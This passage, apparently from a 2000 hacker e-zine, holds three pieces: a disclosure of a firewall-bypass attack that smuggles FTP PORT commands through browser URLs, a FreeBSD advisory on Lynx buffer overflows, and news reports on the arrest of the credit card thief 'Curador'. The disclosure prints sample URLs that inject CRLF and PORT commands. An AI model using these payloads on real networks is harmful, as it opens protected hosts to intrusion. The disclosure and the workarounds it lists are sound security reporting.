users fooling a firewall to let them out isn't new, but the scope of this vulnerability is "new" IMHO. Basically, you can get at anyone with a browser or HTML-enabled mail reader protected by firewalls that have more than 50% market coverage. That's bad. What about Checkpoint's FTP PASV fix for FW-1? Checkpoint's fix for FW-1 is to make sure that every packet in the command stream ends with CRLF (0x0a 0x0d in hex). That would help against the above attack, but not if we modify it a wee bit: src="ftp://ftp.rooted.com/aaaaaaa%0a%0dPORT 1,2,3,4,0,139" Ouch. This WILL work in Netscape v4.7 (I've verified it using a network sniffer, anyone care for a packet dump?). The firewall will see this as two separate commands: RETR aaaaaaaaaa PORT 1,2,3,4,0,139 which means that poorly implemented proxies are likely to be vulnerable aswell. This in and of itself is a browser bug IMHO. Line feeds are not valid characters in a file name. Added: 2000-03-14 Apparently, this CRLF variant will _not_ work in MSIE (version unknown?). It's doing the right thing: stripping out the CRLF. (Second hand info, I have not verified MSIE's behaviour) No information on other browsers or mail readers. Other fixes? I havent seen other firewall vendors make public claims that they protect against any of these attacks. Cisco is apparently working on a fix for PIX, but it's taking time, so I'm guessing they're doing it the right way - since doing it the right way really does take quite a bit of time. It would seem like all the others are silently going to sneak fixes into their upcoming updates and pretend like they never were vulnerable in the first place. Grumble. Added: 2000-03-14 I suspect that FW-1's security servers may disable this attack. (Dunno, I'm not an FW-1 user) What firewalls are likely to be vulnerable? This specific attack is likely to work against most "stateful inspection" firewalls with poorly implemented application layer filters. This probably includes most products out there. It may also affect poorly implemented "proxies" when the CRLF is added before the PORT command as described above. Added: 2000-03-14 Checkpoint FW-1 v3 is likely to allow connections on most ports 1024-65535 with full bidirectional communication Checkpoint FW-1 v4 is likely to allow connection on most ports 1024-65535 with only unidirectional communication Cisco PIX is likely to allow connections to any port with full bidirectional communication Linux's ip_masq_ftp module is _really_ easy to fool, according to Solar Designer. It will accept a "PORT" command anywhere in a packet. This means that even this is likely to work: "http://rooted.com:21/PORT 1,2,3,4,0,139" This is likely NOT a complete list. And no, I'm not going to get in touch with vendors and report the vulnerability. There are just too many that are likely to be affected. "The great picture" Other protocols than FTP are likely to be affected by this type of vulnerability - pretty much any protocol that opens up ephereal ports after the initial command session. A couple that come to mind are: * Oracle SQL*Net (versions using separate data channels) * RealAudio/Video (secondary UDP channel) * H.323 (NetMeeting et al) THIS IS NOT A COMPLETE LIST. Those were just a couple of common ones off the top of my head. Workarounds to this specific vulnerability * Disable active FTP. Errrr, wait. The fix for the server side vulnerability was to disable passive FTP. Let's rephrase that: * Disable FTP altogether. Block port 21. Disable FTP Application Layer Filters on all ports in your firewall. * If you can't change the settings in your firewall, set the "FTP Proxy" setting in your browser/HTML-enabled mail reader to some address that doesn't exist, like 127.0.0.2. After this change, your browser won't be able to connect anywhere using FTP. (From Solar Designer: This does not help if you're using ip_masq_ftp, since it'll be fooled by HTTP looking like FTP.) @HWA 109.0 FreeBSD-SA-00:08: Lynx overflows ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Submitted by FProphet Source: Bugtraq Approved-By: aleph1@SECURITYFOCUS.COM Delivered-To: bugtraq@lists.securityfocus.com Delivered-To: bugtraq@securityfocus.com Date: Wed, 15 Mar 2000 09:34:43 -0800 Reply-To: security-officer@freebsd.org Sender: Bugtraq List Comments: RFC822 error: FROM field duplicated. Last occurrence was retained. From: FreeBSD Security Officer Subject: FreeBSD Security Advisory: FreeBSD-SA-00:08.lynx To: BUGTRAQ@SECURITYFOCUS.COM -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-00:08 Security Advisory FreeBSD, Inc. Topic: Lynx ports contain numerous buffer overflows Category: ports Module: lynx/lynx-current/lynx-ssl/ja-lynx/ja-lynx-current Announced: 2000-03-15 Affects: Ports collection before the correction date. Corrected: See below. FreeBSD only: NO I. Background Lynx is a popular text-mode WWW browser, available in several versions including SSL support and Japanese language localization. II. Problem Description The lynx software is written in a very insecure style and contains numerous potential and several proven security vulnerabilities (publicized on the BugTraq mailing list) exploitable by a malicious server. The lynx ports are not installed by default, nor are they "part of FreeBSD" as such: they are part of the FreeBSD ports collection, which contains over 3100 third-party applications in a ready-to-install format. FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports. III. Impact A malicious server which is visited by a user with the lynx browser can exploit the browser security holes in order to execute arbitrary code as the local user. If you have not chosen to install any of the lynx/lynx-current/lynx-ssl/ja-lynx/ja-lynx-current ports/packages, then your system is not vulnerable. IV. Workaround Remove the lynx/lynx-current/lynx-ssl/ja-lynx/ja-lynx-current ports, if you you have installed them. V. Solution Unfortunately, there is no simple fix to the security problems with the lynx code: it will require a full review by the lynx development team and recoding of the affected sections with a more security-conscious attitude. In the meantime, there are two other text-mode WWW browsers available in FreeBSD ports: www/w3m (also available in www/w3m-ssl for an SSL-enabled version, and japanese/w3m for Japanese-localization) and www/links. Note that the FreeBSD Security Officer does not make any recommendation about the security of these two browsers - in particular, they both appear to contain potential security risks, and a full audit has not been performed, but at present no proven security holes are known. User beware - please watch for future security advisories which will publicize any such vulnerabilities discovered in these ports. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBOM/JklUuHi5z0oilAQEbzQP+K5HbTRk40fmb+pKOcUDD/r4ofcrkWtXn Ya7PT/ALXvUnohm/jqKofNk9cXK1EspbgHb9N1OJZEzcYUAy378WpQgWh4uxKQa7 +541CwFPPIbWfJQJCOaUODN2qwnXdqXMj6noCKRMN0c3tBRG6R2zEfVaM1vMNS1+ +vcp5WAqDu4= =dtMU -----END PGP SIGNATURE----- @HWA 110.0 Curador? BUSTED ~~~~~~~~~~~~~~~ Contributed by Abattis (Wired) and MerXor (MSNBC) Follow-ups by Cruci. (MSNBC) more from HNN in section 119.0 -=- Sources: Wired, MSNBC http://www.wired.com/news/business/0,1367,35186,00.html Alleged Hackers Arrested Reuters 2:05 p.m. Mar. 24, 2000 PST The FBI said Friday that two 18-year-olds had been arrested in Wales for allegedly hacking into nine e-commerce websites around the world and stealing credit card information. The losses connected with the intrusions on websites in the United States, Canada, Thailand, Japan, and Britain could exceed US$3 million, the FBI said in a news release. It said the theft of credit card information related to more than 26,000 accounts, the alleged scheme involved the disclosure of the data on the Internet, and that the accused hackers used the screen name "Curador." The two youths, who cannot be identified under British law, were arrested Thursday by the Dyfed-Powys Police Service in Wales for violating Britain's Computer Misuse Act, the FBI said. The arrests stemmed from an FBI investigation conducted with the Welsh police, the Royal Canadian Mounted Police, and Internet security consultants, the FBI said, adding that the international banking and credit card industry also provided substantial cooperation. The FBI still is investigating last month's wave of cyber attacks that disrupted some of the Internet's most popular sites. The FBI has yet to make any arrests or bring any charges involving those attacks. The FBI's own website was attacked March 14, the same day the agency celebrated the 50th anniversary of its "Ten Most Wanted Fugitives" list, which is publicized on the site, FBI officials said. -=- MSNBC; http://www.msnbc.com/news/386402.asp Consultant was key to �Curador� bust The FBI crowed, but security specialist led police to Wales By Mike Brunker MSNBC March 27 � While the FBI was quick to take credit for the arrest last week of two teen-agers who allegedly stole information on 26,000 credit cards from Internet retailers, a Canadian computer security consultant working with British authorities tracked the suspects back to their small village in Wales before the U.S. agency even got involved, MSNBC.com has learned. A PRESS RELEASE issued Friday by the FBI said the arrests of the two 18-year-olds .came as a direct result of an FBI investigation.. It added that unidentified Internet security consultants had assisted in the case, but nowhere did it mention Chris Davis of HeXedit Network Security Inc. of Ottawa, Ontario, who worked for nearly two months assembling the evidence that led authorities to the suspects. In interviews with numerous news organizations, including MSNBC.com, after the announcement, the FBI�s Michael Vatis said the arrests should serve as a warning to others who would use the Internet to steal. .It�s important to say that anyone who underestimates the skill of our agents ... does so at their own peril,. he said. FBI PLAYED LIMITED ROLE But interviews with Davis and other participants in the case show that the FBI�s role in the investigation of .Curador. was limited. .They (the FBI) did get involved fairly late,. Davis said Monday. .By the time they got involved, (British police) had phone numbers, home addresses and all that.. Phone calls to the National Infrastructure Protection Center, which Vatis heads, were not returned Monday. A spokesman for the FBI declined to comment. .In anything like this, it really doesn�t serve any purpose to go back and try to heap credit one way or the other,. said the spokesman, Paul Bresson. .I think the facts speak for themselves.. But officials of Promobility.net, a wireless phone seller in Ontario that was among the sites hit by .Curador,. confirmed Davis� account. .That is 100 percent accurate,. spokesman Eric Geiler said. .He could have knocked on [the suspects�] doors two weeks before the FBI did.. Davis, who has been a computer security consultant for nearly four years, said he got involved in the case in early February after reading a boastful post from .Curador. � the online alias that authorities say was jointly used by the two 18-year-old suspects � on HackerNews.com about the theft of credit card information from two e-merchants. The credit card information was subsequently posted on a Web site by .Curador,. who said he took the action to publicize the lack of security at many e-commerce sites. �THAT�S PRETTY LOW� .I read the boast and I thought, �That�s pretty low,�. said Davis. .I checked and both sites seemed like fairly small mom-and-pop type operations and I felt sorry for them. So I fired off an e-mail and said and said, �I�ll help you secure your site.� They wrote back and said they had no idea they�d even been hit (by hackers).. Both Promobility.net and Ltamedia.com, a Knoxville, Tenn., seller of .life-enhancing products,. agreed to turn over their computer logs to Davis so he could determine how the intruders had gained entry to their systems and close the security holes. Looking through the logs, Davis discovered that the intrusions were accomplished using two known security holes in Microsoft�s Internet Information Server, or IIS. While Microsoft had issued .patches. to correct the holes months earlier, none of the nine Web sites in the United States, Canada, Thailand, Japan and the United Kingdom that were hit by .Curador. had updated their software to eliminate the problem. (Microsoft is a partner in MSNBC.com.) While he could have simply fixed the flaws and returned to his paying jobs, Davis found himself growing increasingly fascinated by the case and pressed on. By analyzing e-mail sent through a free service that the hackers wrongly thought would shield the IP address, Davis was quickly able to determine that .Curador. was using an Internet service provider in England. He then contacted Scotland Yard, which referred him to police in South Yorkshire, who determined from records obtained from the ISP that the .crackers. the term for computer criminals preferred by law-abiding hackers were in Wales. SEARCH NARROWS TO TWO HOUSES Soon, the British investigators tightened the circle to the tiny fishing village of Clynderwen, population 500, and ultimately to two houses in the village. It was then, Davis said, that he heard from the FBI, which learned from the Royal Canadian Mounted Police that he was working on the case while investigating the thefts from U.S. Web sites. .They were able to quickly obtain logs from everybody who had been affected in the U.S. and I explained how �Curador� had broken in, showing them, �Here�s the line from the log, here�s how he exploited the security vulnerability.�. The FBI, working with the RCMP and the Welsh Dyfed-Powys Police Service, orchestrated the arrests on Thursday of the 18-year-old suspects. The teenagers were questioned for 12 hours after their arrest before being released on bail as the investigation continues, Welsh police said Monday. In accordance with British law, neither of the suspects was publicly identified. But one, Raphael Gray, has given numerous interviews since his release to say that he had acted only to highlight the lack of security on many retail Web sites. .I have done the honest thing, but I have been ignored,. he was quoted as saying by the Sunday Telegraph of London. .That�s why I posted the information on the Internet.. CURADOR�S CLAIMS Authorities have not identified the nine e-commerce sites they say were burgled, but according to .Curador�s. Web sites others include Feelgood Falls; Sales Gate; Shopping Thailand; Vision Computers; NTD Media and the American Society of Clinical Pathologists. Gray has maintained in interviews since his arrest that neither he nor his friend had used the stolen credit card data for personal gain � an assertion backed up by a British businessman who said he hired Gray to run his e-commerce site. .I�d have to give him money to buy lunch or get a haircut,. the businessman told MSNBC.com on Monday. The businessman, who contacted MSNBC.com, agreed to talk about Gray on the condition that neither he nor his Web site be identified because he feared it would be bad for business. His account could not be independently confirmed, but his description of Gray was consistent with other published accounts. The businessman said Gray worked part-time for him for two to three months and was in charge of the company�s Web site, which sells video games. He was fired on March 2 because of chronic absenteeism, he said. �HE KNEW HIS STUFF� .He was very good at his job,. said the man. .Didn�t turn up very often and his personal hygiene wasn�t too good, but he knew his stuff. .He worked developing my company�s e-commerce site, which he claimed was going to be the most secure in the business. What I didn�t realize was that I had one of the world�s biggest credit card hackers looking after my customers.. Meanwhile, a claim by Gray that a credit card belonging to Microsoft founder Bill Gates was among the credit cards he and his friend are accused of stealing was determined to be false on Monday. Gray told the Sunday Telegraph that he had sent information on a number of the cards, including Gates� card, to a U.S. Web site registered to NBC. (NBC is a partner in MSNBC.com.) But examination of one of the Web sites posted by .Curador. showed an entry about William F. Gates. The Microsoft founder�s name is William H. Gates. The credit card number listed also had too few digits to be valid, and both Microsoft�s address and Gates� e-mail address were incorrect. Gray and his friend could face charges under Britain�s Computer Misuse Act of 1990. They also could eventually be extradited to face charges in the United States, the FBI�s Vatis told MSNBC.com on Friday. .The primary consideration is what�s in the interest of justice,. said Vatis. .... We have obviously been investigating violations of U.S. federal criminal law.. The teens are alleged to have caused losses that Vatis said could amount to more than $3 million, based on the cost of canceling the 26,000 credit card accounts and issuing new cards. And Vatis said that was .just one measure of possible loss.. Other costs could arise from any fraudulent use of the credit card numbers, as well as the expense of repairing compromised Web sites, he said. Live Map: Clynderwen The arrests in Wales appear to represent the first major international response to a rapidly growing field in computer crime. Earlier this month, in response to an MSNBC.com investigation of international online credit card theft, spokesmen for the FBI and other organizations involved in fighting cybercrime said they could not recall any past prosecutions in such matters. On Friday, Vatis said he could easily think of .international hacking incidents. that have led to prosecutions, but not in the context of online credit card information. Many such cases are under investigation, he said. Vatis said the international hurdles to investigating Internet crime were not as high as some people might think, contending that the FBI was .building more and more bridges every day. with law enforcement agencies in other countries. -=- MSNBC supplimentary; March 24th Can hackers kill credit cards? Spate of e-commerce intrusions might mean a new form of payment system will come sooner than expected By Bob Sullivan MSNBC March 24 � He calls himself .The Saint of E-commerce.. Two months ago, .Curador. started posting his catalog of stolen credit card numbers on his Web page. He stole database after database from a variety of e-commerce sites, each time updating his site, then gleefully mailing notification to reporters. He topped 25,000 records from 13 Web sites. Despite all that the financial risk and all that violation of personal privacy, no one could stop him. But now authorities in Wales have arrested two 18-year-olds on charges related to the Curador thefts. AUTHORITIES, OF COURSE, had always removed Curador�s Web site � at least a dozen times. No matter; he used the many free, anonymous Web hosting services available on the Internet. And as fast as his Web page is taken down, .Curador. would put up another one. The 18-year-old computer intruder, who also goes by the nickname .mind gimp,. told MSNBC in a telephone interview only that he was located somewhere in Europe. He wasn�t using the credit cards for financial gain, he said The self-proclaimed .Saint of E-commerce. said he simply wanted to embarrass the victim Web sites into employing better security. He promised to continue breaking into e-commerce sites and posting stolen numbers .until I don�t need to do it anymore or until I get arrested.. But until Thursday, as MSNBC�s Mike Brunker reported earlier this month, there hadn�t been a single reported arrest of a foreign credit card thief by U.S. authorities. Curador�s thefts are just another story in this year�s litany of tales surrounding online theft of personal and financial information. E-merchants are furiously fighting the battle to keep down fraud costs, and consumer confidence in Internet safety is continually shaken, with no apparent end in sight. So some experts think Curador may just be another nail in the coffin of a credit card system that was hardly designed for Internet purchasing. .Anyone who�s serious about this is getting a lesson. The wake-up c